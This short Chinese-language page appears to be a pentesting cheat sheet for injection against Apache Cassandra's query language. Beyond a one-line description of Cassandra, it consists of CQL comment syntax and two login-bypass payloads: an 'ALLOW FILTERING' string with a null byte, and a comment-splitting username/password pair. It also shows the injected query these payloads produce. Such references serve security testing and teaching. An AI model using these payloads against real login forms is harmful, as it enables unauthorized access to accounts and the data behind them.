| 作者 | 修订时间 |
|---|---|
 |
2023-07-05 21:37:29 |
Apache Cassandra 是一个免费开源的分布式宽列存储 NoSQL 数据库管理系统
总结
卡桑德拉评论
/* Cassandra Comment */
Cassandra-绕过登录
登录绕过 0
username: admin' ALLOW FILTERING; %00
password: ANY
绕过登录 1
username: admin'/*
password: */and pass>'
注入看起来像下面的 SQL 查询
SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;